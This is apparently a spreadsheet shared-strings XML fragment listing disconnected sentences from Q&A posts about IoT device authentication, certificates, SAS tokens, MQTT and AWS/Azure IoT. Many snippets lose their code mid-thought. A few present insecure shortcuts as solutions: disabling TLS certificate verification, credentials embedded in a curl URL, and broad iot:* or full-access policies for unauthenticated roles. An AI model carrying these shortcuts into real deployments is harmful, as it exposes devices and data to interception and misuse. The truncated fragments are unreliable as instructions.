    <t>It is a home-server cluster made with 4 raspberrys, and what I want is the SSL auto-certificate function, and the HTTP to HTTPS redirection.</t>
  </si>
  <si>
    <t>If the next request from the same IP address includes a hash based on some secret code + the token sent, the next request is honored.</t>
  </si>
  <si>
    <t>One of the possibilities would be to follow the steps under Run a Script at Login on this website:
http://www.opentechguides.com/how-to/article/raspberry-pi/5/raspberry-pi-auto-start.html
You may want to take a look at Auto Login as well.</t>
  </si>
  <si>
    <t>In order to obtain it, you can use Wireshark to capture this request header while sending request from your browser, or generate it:
Check in your XBMC settings (Settings &gt; Services &gt; Webserver) for the username/password.</t>
  </si>
  <si>
    <t>you will have to sign in on this page
https://www.windowsforiotdevices.com/
To accept the commercial terms and receive the license terms.</t>
  </si>
  <si>
    <t>First of all try the solutions exposed here: http://www.mono-project.com/docs/faq/security/
The mozroots solution usually works the best, just execute it and all the certificates will be updated.</t>
  </si>
  <si>
    <t>To do firmware update using only what's available publicly today in IoT Hub, you'd probably start by sending a cloud-to-device message to your Edison.</t>
  </si>
  <si>
    <t>You can supply the username and password in the request URL by the following scheme: 
You don't need Selenium to make HTTP requests.</t>
  </si>
  <si>
    <t>See https://github.com/etingof/pyasn1-modules/issues/10, I suspect this has to do with oauth2client's deprecation and the releases of pyasn1 and pyasn1-modules on 11/23/17.</t>
  </si>
  <si>
    <t>Summary (from docs)
In summary, even if the only use case is device-to-cloud telemetry ingress, IoT Hub provides a service that is designed for IoT device connectivity.</t>
  </si>
  <si>
    <t>Have changed USER variable to:
And has set to false tls.cert.verify
tls.cert.verify(false)
Works now :)</t>
  </si>
  <si>
    <t>I still haven't figured out what those specific error messages were, but I do notice that when there are errors such as CA certificate auth failures, lots of messages get sent up.</t>
  </si>
  <si>
    <t>Amazon knew this was coming and, in response to these new policies, released updates to their MQTT backend (AWS IoT) to include appropriate certification on a new endpoint.</t>
  </si>
  <si>
    <t>Certificate chains are provided by the server you are connecting to and the Android device simply verifies that the chain is valid, matches a trusted root, and hasn't expired.</t>
  </si>
  <si>
    <t>You will utilize TLS libraries such as mBed that can request the SIM card to sign requests using the keys and perform request encryption.</t>
  </si>
  <si>
    <t>HTTP authentication is a method for a HTTP user agent to provide a user name and a certain proof confirming the user's identity when making a request.</t>
  </si>
  <si>
    <t>Authorize.Net is a popular payment gateway used to process credit card transactions.</t>
  </si>
  <si>
    <t>The preferred method for connecting a merchant Web site to the Authorize.Net Payment Gateway.</t>
  </si>
  <si>
    <t>Socket Secure (SOCKS for short) is an Internet protocol that routes network packets between a client and server through a Proxy server.</t>
  </si>
  <si>
    <t>It can be configured to use openssl or  to provide fully encrypted client and server links including client certificate support.</t>
  </si>
  <si>
    <t>We provide a full suite of sample applications and documentation on GitHub to help you get started with learning the Azure Identity system.</t>
  </si>
  <si>
    <t>Message-identifier values are used as follows:  
The system reserves message-identifier values in the range 
through 0x03FF (the value of WM_USER   1) for system-defined
messages.</t>
  </si>
  <si>
    <t>Requiring the client to provide authentication data in the same HTTP
Request used to perform any operation with security implications
(money transfer, etc.)</t>
  </si>
  <si>
    <t>MockServer Proxy can:
proxy all requests using any of the following proxying methods:
Port Forwarding
Web Proxying (i.e.</t>
  </si>
  <si>
    <t>The following security measures are currently supported:
Authentication of connections to brokers from clients (producers and consumers), other brokers and tools, using either SSL or SASL.</t>
  </si>
  <si>
    <t>How best to do this can be a complex topic, as in true REST each client request to the server will contain all the information necessary to complete it (including authentication).</t>
  </si>
  <si>
    <t>Azure IoT Hub grants access to endpoints by verifying a token against the shared access policies and identity registry security credentials.</t>
  </si>
  <si>
    <t>So either:
You are requesting a URL which isn't http://readsensor.epizy.com/esp_post.php, and then the JavaScript doesn't run, and you never request the PHP or
The PHP checks to see if a cookie is set, and if it is not, it outputs JavaScript to set it, and then redirect to run the script again.</t>
  </si>
  <si>
    <t>More details on this issue: https://github.com/pyca/cryptography/issues/4635
A possible workaround: https://github.com/firebase/firebase-admin-python/issues/234</t>
  </si>
  <si>
    <t>The connect descriptor received by the listener specified a service name for a service (usually a database service) that either has not yet dynamically registered with the listener or has not been statically configured for the listener.</t>
  </si>
  <si>
    <t>The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer.</t>
  </si>
  <si>
    <t>I want to know to create bot and send message on Telegram, and send command for example /commandPi sudo apt-get update ... 
You need yo configure the bot with info and create a token but i dont know how to program it.</t>
  </si>
  <si>
    <t>But you need to change it to match the service bus connection string format -
"Endpoint=[your iot hub compatible end point];SharedAccessKeyName=[your key name];SharedAccessKey=[your key];EntityPath=[your event hub compatible name]"
key name and key can be taken from the "Shared access policy" section.</t>
  </si>
  <si>
    <t>Digest authentication and proxy authentication
Extra new status codes
Chunked transfer encoding
Connection header
Enhanced compression support
Resources:
full specs 
differences between http 1.0 and http 1.1</t>
  </si>
  <si>
    <t>These manipulations include: expiration, persistence, notification of expired messages (dead-letter queues), message cloning, queue security, distribution (between multiple Queue Managers).</t>
  </si>
  <si>
    <t>No 'Access-Control-Allow-Origin' header is present on the requested resource.</t>
  </si>
  <si>
    <t>The only SSL certificates that appear to work are windows generated PFX certificates created using powershell.</t>
  </si>
  <si>
    <t>Therefore, if the data source is
  not capable of providing a timestamp, for example, the OPC DA server
  must create a timestamp.</t>
  </si>
  <si>
    <t>Similar for edge server and client are on two different Win 10 machines, but you should install the cert first, like writing following code:
If it's still not working, do check if you are not running to any certification validation issues, and it is how it works:
Edge runtime in docker container will send left (deivce cerificate) during TLS handshake.</t>
  </si>
  <si>
    <t>Organizations that are using Active Directory Domain Services (AD DS) can use Group Policy to provide certificate enrollment policy to domain members by using the Group Policy Management Console to configure the certificate enrollment policy settings.</t>
  </si>
  <si>
    <t>Now I am using the same azure baltimore Root certificate provided by them (Digicert) and with OPENssl i created the Client key and crt from where I toke the thumbprint is that correct?</t>
  </si>
  <si>
    <t>Also, with aws-sdk we can do administrative tasks in the IoT, we can
  create a thing, create a certificate, etc.</t>
  </si>
  <si>
    <t>Those parameters refer to the shared access policies of the event hub.</t>
  </si>
  <si>
    <t>You can use device id created from IoT Hub or leave it empty then it will be assigned to registration id when you registering this device.</t>
  </si>
  <si>
    <t>A .Net library for validating JSON against a schema or generating a schema from an existing .Net class.</t>
  </si>
  <si>
    <t>We then followed another Azure document and downloaded Device Explorer, created a device and generated a SAS token.</t>
  </si>
  <si>
    <t>I want
  to use a SAS-token to connect with expiration, instead of connecting
  with the symmetric key of the device
You can't send Cloud-To-Device message using device-level credentials.</t>
  </si>
  <si>
    <t>If it cannot find a certificate under the expected keystore name, it then creates a new certificate, saves it in the keystore, and then tries to attach the principle policy to it.</t>
  </si>
  <si>
    <t>The error posted in the JSON of the Activity Log is:
We don't have any properties named username in our input stream, nor does our job deserialize anything at all other than IOT Hub input.</t>
  </si>
  <si>
    <t>IIRC AWS only opens a couple of specific ports, this may help you open up some more:
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html</t>
  </si>
  <si>
    <t>Then I updated the trust store certificates to add the above downloaded certificate,  
After updating i refered the ca-certificates file in my code,  
conn_opts.ssl-&gt;trustStore = "/etc/ssl/certs/ca-certificates.crt";</t>
  </si>
  <si>
    <t>IKEA Trdfri's firmware update changed in such a way that you must create a new identity for your integration: https://github.com/ggravlingen/pytradfri/issues/90</t>
  </si>
  <si>
    <t>I am following a tutorial on how to run a reverse ssh tunnel which is found at http://wiki.fabelier.org/index.php?title=Permanent_Reverse_SSH_Tunneling
Issue I am having is when I run the tunneling.sh script:
I receive this error:
I am a extreme newbie to shell scripts in linux so please be kind.</t>
  </si>
  <si>
    <t>That's fine for sending the request when the phone joins Wifi, but not when it leaves Wifi, because both HTTP requests must be sent on the LAN: they contain sensitive data.</t>
  </si>
  <si>
    <t>For my CCTV project I would like to be able to get my Raspberry Pi, which I may note is running the Security Camera itself, to run a http POST request which then triggers a notification on my phone.</t>
  </si>
  <si>
    <t>Port numbers are considered part of the domain when testing cross-origin requests, so it has to be going to the same port as the requesting page.</t>
  </si>
  <si>
    <t>If you want to use client verification you need those two:
setCertificate: this will be your client certificate
setPrivateKey: this will be the corresponding key
Here is an website I found useful:
https://nofurtherquestions.wordpress.com/2016/03/14/making-an-esp8266-web-accessible/ - Chapter "Code"</t>
  </si>
  <si>
    <t>It processes or decorates HTTP requests and responses to provide features such as session handling, authentication, asset management or compression.</t>
  </si>
  <si>
    <t>Wiki:
Ih the field of computer security Logging out or  is the process of terminating an authenticated session or purging an authenticated state.</t>
  </si>
  <si>
    <t>The  Class is a Microsoft .NET communication class that represents an
exception that is thrown when a remote endpoint could not be found or reached.</t>
  </si>
  <si>
    <t>Chubby allows clients to take a lock, possibly associating it with some metadata, which it can renew by sending keep alive messages back to Chubby.</t>
  </si>
  <si>
    <t>I have tried a combination of things such as removing the https:// from server[], changing the port to 443 instead of 80, removing the /beta from server[], using client.connectSSL instead of client.connect, but none of these have worked so far.</t>
  </si>
  <si>
    <t>The basic idea being that the signature allows the user to connect to AWS IOT but only with a specific client ID and with restrictions to the subscription topics as well as received messages.</t>
  </si>
  <si>
    <t>In the connection string I've used the shared access key from my shared access policy from the hub but got an exception:
Unauthorized: Device 'xxx' at IotHub 'yyy' does not have PrimaryKey or SecondaryKey
I assume that will only work if I register the device with symmetric keys.</t>
  </si>
  <si>
    <t>Simplest way: (and not very secure) way would be to send some secret inside the request:
Use HTTPS, so that the request can not be (easily) snooped and secret extracted.</t>
  </si>
  <si>
    <t>http://blogs.msdn.com/b/wsdevsol/archive/2015/03/26/how-to-use-a-shared-user-certificate-for-https-authentication-in-an-enterprise-application.aspx
Excerpt from the article:
However, the security subsystem requires user confirmation before allowing access to a certificates private key of a certificate stored in the shared user certificates store.</t>
  </si>
  <si>
    <t>You could have a look at Adafruit Fingerprint Library
In source code, there's exemple to enroll fingerprint:
https://github.com/adafruit/Adafruit-Fingerprint-Sensor-Library/blob/master/examples/enroll/enroll.ino
You could get Image of Fingerprint with method  from https://github.com/adafruit/Adafruit-Fingerprint-Sensor-Library/blob/master/Adafruit_Fingerprint.cpp</t>
  </si>
  <si>
    <t>To provide authorization capabilities for the GPS devices behind the gateway, you would have to add some code to your backend solution (behind IoT Hub) to do that and your protocol gateway would also have to include a device identifier in the messages to/from IoT Hub.</t>
  </si>
  <si>
    <t>Source: https://github.com/nodemcu/nodemcu-firmware/#programming-model
That means that functions which accept callback functions as parameters are non-blocking.</t>
  </si>
  <si>
    <t>That leaves two issues I can think of: the date, or you have some kind of strange configuration for wget somehow changing how it handles cert dates.</t>
  </si>
  <si>
    <t>It works with any IoT device running Linux (most popular distributions) and integrates seamlessly with the Azure IoT Suite to connect, analyze, and secure your IoT solutions.</t>
  </si>
  <si>
    <t>It allows messages to be mediated via Java or JSR 223 scripting languages through an API, and is the first ESB to claim support for Zero-Copy proxying of messages with Non-Blocking IO capabilities.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a library for python 2 and 3 providing a HTTP API with thread-safe connection pooling, file posting support, redirection handling and retries.</t>
  </si>
  <si>
    <t>It allows
  messages to be mediated via Java or JSR 223 scripting languages
  through an API and is the first ESB to claim support for Zero-Copy
  proxying of messages with Non-Blocking IO capabilities.</t>
  </si>
  <si>
    <t>Examples of payloads include data destruction, messages with insulting text or spurious e-mail messages sent to a large number of people.</t>
  </si>
  <si>
    <t>Click on [CONNECTIVITY], then fill in:
Server port: 1883
Client ID: arduino
Client Timeout: 2
Keep Alive: 60
Topic: arduino
[v] ENABLE SLIP... 
Click on both [UPDATE] buttons, and ensure that parameters are registered.</t>
  </si>
  <si>
    <t>The client ID must be the following format:
where 
org_id is the organization ID provided when you signed up and displayed when you log into https://internetofthings.ibmcloud.com or as seen in your Bluemix IoTF service credentials (as provided in your VCAP_SERVICES properties).</t>
  </si>
  <si>
    <t>The middleware then processes all incoming POST requests that have the session cookie set, checks that the 'csrfmiddlewaretoken' is present and correct, and if it isn't, throws a 403 error.</t>
  </si>
  <si>
    <t>Validation is taken seriously and strictly enforced by default for all unsecure input sources (input parameters from command line, HTTP requests, cookies, HTTP headers or submitted files).</t>
  </si>
  <si>
    <t>token error message.</t>
  </si>
  <si>
    <t>IoT Hub has a policy with all permissions and all the ADAs are using that policy.</t>
  </si>
  <si>
    <t>Running the code below throw an exception 'System.UnauthorizedAccessException'.</t>
  </si>
  <si>
    <t>However when trying to consume the API i always get an unauthorized exception.</t>
  </si>
  <si>
    <t>I have the Root CA, client key and client certificate files on the device that authorize the access.</t>
  </si>
  <si>
    <t>but I keep getting a 401 UNAUTHORIZED response.</t>
  </si>
  <si>
    <t>However, I need to get the DeviceId from the message.</t>
  </si>
  <si>
    <t>I was trying to Publish and Subscribe using authenticated user on AWS IoT with Federated Identities.</t>
  </si>
  <si>
    <t>Microsoft.Azure.Devices.Client.Exceptions.UnauthorizedException.</t>
  </si>
  <si>
    <t>I kept getting message: unauthorized.</t>
  </si>
  <si>
    <t>Also, we want to use SSL Client certificate and token to connect.</t>
  </si>
  <si>
    <t>I know the certs are fine, and mosquitto command works with auth token.</t>
  </si>
  <si>
    <t>the response is 401 Unauthorized.</t>
  </si>
  <si>
    <t xml:space="preserve">
Here I want to attach a policy with aws certificate in aws iot.</t>
  </si>
  <si>
    <t>Is there any other method for attach policy with aws Certificate?</t>
  </si>
  <si>
    <t>(A, B device and A, B token value)
So, I want to GET other device's token value, (from A device to B device)
Is it Possible ?</t>
  </si>
  <si>
    <t>Attached the snap of that
When i try to connect to this, I am getting an error "Not authorized to connect".</t>
  </si>
  <si>
    <t>I am getting an HTTP error 401 (unauthorized access).</t>
  </si>
  <si>
    <t>I tried with same user, different users, same access token, different access tokens.</t>
  </si>
  <si>
    <t>How can we update a SSL certificate the same way as in Azure IoT Hub.</t>
  </si>
  <si>
    <t>I think you should edit your post so as to hide your token.</t>
  </si>
  <si>
    <t>http://docs.aws.amazon.com/iot/latest/apireference/API_CreateCertificateFromCsr.html</t>
  </si>
  <si>
    <t>If you are getting unauthorized exception .</t>
  </si>
  <si>
    <t>You also need a policy that allows your certificate to connect using that client id.</t>
  </si>
  <si>
    <t>https://ngrok.com/docs#authtoken
First, go to ngrok website and login with an account.</t>
  </si>
  <si>
    <t>connectionDeviceId is stamped on servicebound messages by the IoT Hub.</t>
  </si>
  <si>
    <t>One policy can be attached to different certificates.</t>
  </si>
  <si>
    <t>Access to the AWS IoT message broker via HTTP does not use AWS Sig v4 for authentication.</t>
  </si>
  <si>
    <t>ORA-28002: the password will expire within X days</t>
  </si>
  <si>
    <t>Client cert auth coming soon.</t>
  </si>
  <si>
    <t>http://docs.oracle.com/javase/7/docs/api/java/security/SecureRandom.html</t>
  </si>
  <si>
    <t>I can log the NMEA messages but get frequent Invalid GSV Messages.</t>
  </si>
  <si>
    <t>If you're using the Microsoft Java client for IoT Hub, you don't need to create the SAS token yourself, the SDK does it for you.</t>
  </si>
  <si>
    <t>You need to attach AWSIoTFullAccess policy to unauthenticated role in IAM.</t>
  </si>
  <si>
    <t>All widget are disappear with message
 "Access Forbidden You haven't access rights to this location!</t>
  </si>
  <si>
    <t>An Android class to intercept load requests, key events, and other events.</t>
  </si>
  <si>
    <t>For example, when a device connects using a certificate and the certificate expires, the device can still send and receive data while it has a valid token.</t>
  </si>
  <si>
    <t>The only way to install an Intermediate certificate chain is to upload a Certificate that contains the chain.</t>
  </si>
  <si>
    <t>This is alike [Authorizing a request to Twitter API][1], and I am stuck in the step of [Creating a signature][2].</t>
  </si>
  <si>
    <t>It seems I should store an x.509 intermediate certificate in the app and generate a leaf certificate to register the device.</t>
  </si>
  <si>
    <t>To give you a hint in the right direction, try learning about key agreement protocols (for example, asymmetric Diffie-Hellman) and challenge-response protocols.</t>
  </si>
  <si>
    <t>OK, it turns out that I had to load the certs/key before creating the SSL session, not after:
instead of:</t>
  </si>
  <si>
    <t>Writing files to any other location seems to be disabled, and I'm faced with Unauthorized exception.</t>
  </si>
  <si>
    <t>Here is the code I'm using to generate the signed URL:
I've followed the example of MQTT over WSS as exactly as possible, and my assumed role has all IoT permissions.</t>
  </si>
  <si>
    <t>Documentation for the  call, here
Remember to authorize your IAM role for subscribing / publishing as well.</t>
  </si>
  <si>
    <t>You would still need to authenticate out-of-band, using HttpClient, obtain the cookies and authentication headers, then use them when you build your HttpRequestMessage.</t>
  </si>
  <si>
    <t>Since you need to use openssl to create certs for your devices you should use OS instructions or find a library that can do this on NodeJS level.</t>
  </si>
  <si>
    <t>Messages is a publish-subscribe API for co-present iOS and Android devices to discover and communicate with each other, as well as beacons.</t>
  </si>
  <si>
    <t>This ensures that a CAN system can never get into a live lock state in which two nodes would continually re-send the same two messages, and continually collide with each other.</t>
  </si>
  <si>
    <t>The last 2.x version (2.2.6) was released on October 31st, 2015, which is also the date when security maintenance support for the 2.x version tree was officially ended.</t>
  </si>
  <si>
    <t>In the beginning I generated SAS token from there, but it hasn't the "&amp;skn=" part, so I tried to generate a new SAS using compatible event hub from visual studio.</t>
  </si>
  <si>
    <t>The code in the library is as follows and allows me to pass in a socketUrl
I have tried generating a presigned URL for IoT, which seems to work in terms of authenticating (i.e.</t>
  </si>
  <si>
    <t>Referring to IoT Apps with AWS IoT and Websockets, slide 56/60 shows the registration process where a lambda is used to create and attach a policy.</t>
  </si>
  <si>
    <t>If the socket is marked nonblocking and no pending connections are present on the queue, accept() fails with the error EAGAIN or EWOULDBLOCK.</t>
  </si>
  <si>
    <t>All the users connected to AP (wlan0) will get internet from eth0
When I configured browser with Proxy 192.168.0.1:3128 all http and https sites are accessible 
Now I setup a Squid in transparent mode.</t>
  </si>
  <si>
    <t>Since they do not provide any kind of unified blacklisting, I want to set up voipbl (http://www.voipbl.org/) on a Raspberry PI (using asterisk-raspberrypi)... but is this possible before I go through the trouble?</t>
  </si>
  <si>
    <t>I've read that I need to set trust to the openssl certs in the sample directory but I've not figured out how to do this task or how to avoid this problem.</t>
  </si>
  <si>
    <t>Suggestions
You shoul create IoT policies with restrictions and to use all the elements I have described here you need to configure the correct permissions.</t>
  </si>
  <si>
    <t>:
https://docs.wso2.com/display/AM260/Accessing+API+Manager+by+Multiple+Devices+Simultaneously
Maybe you just can create other user with necessary permissions and set that in the other device.</t>
  </si>
  <si>
    <t>ASP.NET Membership works on top of forms-authentication and gives you:
Ability to create and store users and their passwords with little or no code.</t>
  </si>
  <si>
    <t>Once the user is logged in, each subsequent request will include the JWT, allowing the user to access routes, services, and resources that are permitted with that token.</t>
  </si>
  <si>
    <t>Couple things to note:
The user whose access and secret keys are being used to create this thing has the following AWS policies (we're gonna lock these down once we get this working):
- AWSIoTLogging
- AWSIoTConfigAccess
- AWSIoTRuleActions
- AWSIoTConfigReadOnlyAccess
- AWSIoTDataAccess
- AWSIoTFullAccess</t>
  </si>
  <si>
    <t>for simply publishing sensor
values to a local frontend via websockets - which I'm already doing)
Do local (on the same machine) clients require the username and
password if specified?</t>
  </si>
  <si>
    <t>I then thought that the SVGs must be partially corrupted, and switched them out with four copies of a file I found on the net (http://www.spriteland.com/sprites/downloads/night-background_SVG.svg) renamed to day.svg, night.svg, evening.svg and morning.svg.</t>
  </si>
  <si>
    <t>In a nutshell you have 3 ways to provision a device with unique identity and credentials: using a connection string with a unique ID and Key (which allows to compute a SAS Token on the device), using a SAS Token (which you would have to create offline), or using an X-509 certificate.</t>
  </si>
  <si>
    <t>JSON Web Token (JWT, pronounced "jot") is an emerging type of token-based authentication used in space-constrained environments such as HTTP Authorization headers.</t>
  </si>
  <si>
    <t>Request headers may also include metadata such as credentials, preferred content types and session cookies.</t>
  </si>
  <si>
    <t>Important: This happens only if you are runing python3 on the console of the raspberry pi ( no ssh ), using Raspbian
So here is the code that causes trouble:
Console output
So it would seem that print() does an implicit call to encode but that any errors throws an exception.</t>
  </si>
  <si>
    <t>When trying to send strings of information through the port, I receive the following message:
An unhandled exception of type 'System.UnauthorizedAccessException' occurred in System.dll .</t>
  </si>
  <si>
    <t>After plenty of searching online, and by common sense, I'm pretty sure HttpClient is barfing because of a problem establishing the mutually-authenticated SSL connection.</t>
  </si>
  <si>
    <t>I select the correct cert and still get the same exception (this at least lets me know the cert is installed correctly and validating properly with the CA from the app's perspective).</t>
  </si>
  <si>
    <t>What I am doing is passing the function receviedChars which will be something like:
token0,token1,token2
When i print out func, it reads out , so I figured that if I compared func to c it should match true.</t>
  </si>
  <si>
    <t>The error I get on Unix, when using IoTHubClient.send_event_async is:
I have tried to fix it by setting the system time and checking out the certificate specifications:
I tried to "ping" the server to see if I can connect to it with:
openssl s_client -connect .azure-devices.net:8883
I get:
From I can understand all looks good.</t>
  </si>
  <si>
    <t>I have combined the client certificate and key files (produced by using openssl) into certificate.h:
My sketch:
This yields the follwoing result from mosquitto:
1520115630: mosquitto version 1.4.10 (build date Mon, 29 May 2017 13:43:29 +0100) starting
1520115630: Config loaded from /etc/mosquitto/conf.d/mosquitto.conf.</t>
  </si>
  <si>
    <t>For Identity translated Gateway scenario, should the Edge gateway have the connection string for all downstream devices with it or it can use DPS service to get the connection string?</t>
  </si>
  <si>
    <t>A rather difficult alternative would be to write a plugin yourself and make that do whatever it needs to do (though this will require at least decent C skills as well as security awareness) http://redmine.lighttpd.net/projects/1/wiki/HowToWriteALighttpdPlugin</t>
  </si>
  <si>
    <t>If i'm correct, http_port defined in intercept mode will serve only http traffic, not https
In the squid config, define https_port in intercept/transparent mode and forward your 443 port to that https_port.</t>
  </si>
  <si>
    <t>However, you can choose to not use the default proxy by setting HttpClientHandler.UseProxy to false (for System.Net.Http) or HttpBaseProtocolFilter.UseProxy to false (for Windows.Web.Http).</t>
  </si>
  <si>
    <t>Turn on whatever logging is available on the rpi webserver to check for an inbound request (from laptop and then nodemcu) and also verify the netmask setting for the nodemcu is the same as the rpi (as the webserver response could be routed out of the gateway if they differ).</t>
  </si>
  <si>
    <t>An example of a rule listening on the fictive topic device/+/telemetry and interested in capturing all the fields in the received payload would be :
Note how the + can be used as a placeholder for any device identifier for instance.</t>
  </si>
  <si>
    <t>In MQTT using AWS I don't think there is a provision to get the IP of the user
The message broker does not support persistent sessions (connections
  made with the cleanSession flag set to false.</t>
  </si>
  <si>
    <t>The issue was not in the program it was in the configuration on the aws side once i fixed the policy it started working 
i had to fix my iot policy that attaches to the certificates with 
iot:* for actions</t>
  </si>
  <si>
    <t>It can be used to proceed http requests (all methods supported) or to simulate a browser including support for sessions and cookies.</t>
  </si>
  <si>
    <t>ICAP is generally used to implement virus scanning and content filters (including censorware) in transparent HTTP proxy caches.</t>
  </si>
  <si>
    <t>The services included are IBM Push Notifications, Mobile Analytics, App ID, and Mobile Quality Assurance, which have open-sourced client SDKs and samples available at the IBM Bluemix Mobile Services GitHub repository.</t>
  </si>
  <si>
    <t>A classic use case for a Filter is checking the presence of the logged-in user in the HTTP session before continuing a HTTP request.</t>
  </si>
  <si>
    <t>It describes the available web service methods, the message request and response structures, the possible faults, and the communication and security requirements.</t>
  </si>
  <si>
    <t>Popular services that support OAuth 2
Dropbox
Box
Facebook's Graph API
GitHub
Google
Microsoft Graph
SoundCloud
Windows Live
References
Official OAuth 2 website
OAuth 2.0 specification
The OAuth 2.0 Authorization Framework: Bearer Token Usage
Official Logo:</t>
  </si>
  <si>
    <t>The eventual following stack trace is caused by an error thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access, and has no functional impact.</t>
  </si>
  <si>
    <t>Devices on WiFi networks are protected from the Internet by a firewall, which is normally configured to return responses to requests sent by the devices, but block all unsolicited messages.</t>
  </si>
  <si>
    <t>This extension implements an easy-to-use object oriented consumer and provider for OAuth 1.0
OAuth provides a method for clients to access server resources on
  behalf of a resource owner (such as a different client or an
  end-user).</t>
  </si>
  <si>
    <t>Policy Enforcement Point (PEP): this is the component that protects applications, intercepts business requests, creates authorization requests, sends them to the PDP, gets a decision back and enforces the decision.</t>
  </si>
  <si>
    <t>For example i want to make a post request to iotagent service to send the measure of the temperature and humidity....these are published until now to the mosquitto as 
Essentially i want to send to my IOT agent the decrypted frame payload that the phypayload includes,which is 006700ED016866 HEX.This means that the temperature is 00ED(HEX) and the humidity 66(HEX) according the cayenne low power payload format.</t>
  </si>
  <si>
    <t>More capabilities, like daemon mode with forking, client address check,
"tail -f" mode, some stream data processing (line terminator conversion),
choosing sockets, pipes, or ptys for interprocess communication, debug and
trace options, logging to syslog, stderr or file, and last but not least
precise error messages make it a versatile tool for many different purposes.</t>
  </si>
  <si>
    <t>Automatically provisioned SSL certificate
Blazing-fast content worldwide
Support for client-side routing
Atomic deploys and one-click rollbacks
Related tags
firebase
firebase-tools
firebase-database
firebase-security
firebase-storage</t>
  </si>
  <si>
    <t>Does anyone know if it is possible to get your certificate from an IoT Certificate created by CloudFormation?</t>
  </si>
  <si>
    <t>As such this code would throw an error from PyAudio complaining about SpeechRecognition trying to access a microphone already being used (by Snowboy).</t>
  </si>
  <si>
    <t>I am trying to use my edge device as a transparent gateway.</t>
  </si>
  <si>
    <t>It could be possible that SAS token expires.</t>
  </si>
  <si>
    <t>when you want to use your own CA you need to create the certificates with this CA and using openssl.</t>
  </si>
  <si>
    <t>Is there a way to tell the ethernet client to not read the headers?</t>
  </si>
  <si>
    <t>I'm trying to connect my Arduino with ethernet to Xively using their MQTT server but am having trouble authenticating.</t>
  </si>
  <si>
    <t>I am able to do a handshake, thanks to some code (https://github.com/ejeklint/ArduinoWebsocketServer).</t>
  </si>
  <si>
    <t>I already tried using it as the calendarId:
But that gives a 401 Unauthorized response.</t>
  </si>
  <si>
    <t>I am also getting an error that is saying the connection is not https and, instead, it is http.</t>
  </si>
  <si>
    <t>I can see my rules in my aws console under Amazon IoT, along with my thing, cert, and policy.</t>
  </si>
  <si>
    <t>I installed this SHA library: https://github.com/Cathedrow/Cryptosuite.</t>
  </si>
  <si>
    <t>https://github.com/knolleary/pubsubclient/tree/master/examples/mqtt_esp8266
My device is registered with the IBM Bluemix IoT Foundation (IoTF).</t>
  </si>
  <si>
    <t>An username and SAS token is required by Iot Hub.</t>
  </si>
  <si>
    <t>Why AWS separates the access of the message broker?</t>
  </si>
  <si>
    <t>We are using the Paho client but are getting a CONNACK with a return code of 5  Not Authorized.</t>
  </si>
  <si>
    <t>Can I do it another way, or somehow secure that POST request?</t>
  </si>
  <si>
    <t>I tried also to check the certificate validity:
openssl x509 -in /usr/lib/ssl/certs/Baltimore_CyberTrust_Root.pem
I get:
  ........
  Validity
            Not Before: May 12 18:46:00 2000 GMT
            Not After : May 12 23:59:00 2025 GMT
    ......</t>
  </si>
  <si>
    <t>Raspbian and Web Client will subscribe to a common channel and then they will exchange ssh packets over that channel.</t>
  </si>
  <si>
    <t>I'm using a blynk client written in Node JS on my raspberry pi that connects and authenticates to the blynk server.</t>
  </si>
  <si>
    <t>Why not let the devices subscribe to a topic to get the firmware?</t>
  </si>
  <si>
    <t>I know it may not be foolproof until each message is not authenticated</t>
  </si>
  <si>
    <t>Also, can the Azure IoT Java Device SDK send MQTT by authenticating using X.509 certificates?</t>
  </si>
  <si>
    <t>I went to the .../index.html, attached my certs, etc.</t>
  </si>
  <si>
    <t>I have attached my Cognito Identity to the Thing and to a Policy.</t>
  </si>
  <si>
    <t>I have attached an IoT certificate to the Thing and to a different Policy.</t>
  </si>
  <si>
    <t>Using Linux - I have no problems:
curl -X POST user:password@172.16.1.4:5984/iot/ -H "Content-Type: application/json" -d '{"a":3}'</t>
  </si>
  <si>
    <t>Client subscribes to IOT with Cognito credentials.</t>
  </si>
  <si>
    <t>I was thinking of using a Cognito User Pool trigger, but that will only work for my users who authenticate with Cognito and not with Facebook or Google.</t>
  </si>
  <si>
    <t>I need to implement the same for the Authenticated user in which the AWS Cognito provides the Access Key,Secret Key and Access Token for the user.</t>
  </si>
  <si>
    <t>No exception is logged in the console.</t>
  </si>
  <si>
    <t>From my research on the last 2 days, it seems like I need a token as well.</t>
  </si>
  <si>
    <t>After provisioning, the client must be uniquely identifiable.</t>
  </si>
  <si>
    <t>I am building a browser application that connects to AWS IoT using Cognito User Pools for authentication and Identity Pools for federation.</t>
  </si>
  <si>
    <t>I am getting "malformed token" exception.</t>
  </si>
  <si>
    <t>The devices are registered at my IoT hub.</t>
  </si>
  <si>
    <t>I have two devices registered in IoT Hub.</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-ca/azure/iot-edge/how-to-auto-provision-simulated-device-windows
any idea how to do provision a device with x509 certificate?</t>
  </si>
  <si>
    <t>The application that needs to connect to that server is telling me it needs a publicCert pem file and a privateKey pem file to communicate with the server.</t>
  </si>
  <si>
    <t>We have the edge configured as a transparent gateway.)</t>
  </si>
  <si>
    <t>If I login to IOTHub portal, the device would show as  under Runtime Response.</t>
  </si>
  <si>
    <t>With C# SDK all I need are the .PFX file with password, DPS_IDSCOPE and  device endpoint something like this (xyz.azure-devices-provisioning.net).</t>
  </si>
  <si>
    <t>The code (Javascript/Node):
The code is copied from register_x509.js in azure-iot-sdk-node.</t>
  </si>
  <si>
    <t>Thanks
Access Forbidden Message Picture</t>
  </si>
  <si>
    <t>There is no HID_Device_UP though as I have seen in tutorials (http://www.idevstream.com/?p=322).</t>
  </si>
  <si>
    <t>The topic is not valid: iot-2/type/sound/id/ipt/evt/db/fmt/json The topic does not match an authorized rule
Why this don't work?</t>
  </si>
  <si>
    <t>BTW, i am using this:
https://github.com/HackerShackOfficial/Smartphone-Doorlock
I also tried to go on without pigpio, but it seems like the module pigpio is necceseary.</t>
  </si>
  <si>
    <t>I am using X.509 authentication to authenticate my downstream device but for some reason I am not able to authenticate my downstream device.</t>
  </si>
  <si>
    <t>Are there any other benefits of having a transparent gateway?</t>
  </si>
  <si>
    <t>I get the message but when i look at the JSON file, the Body is encrypted.</t>
  </si>
  <si>
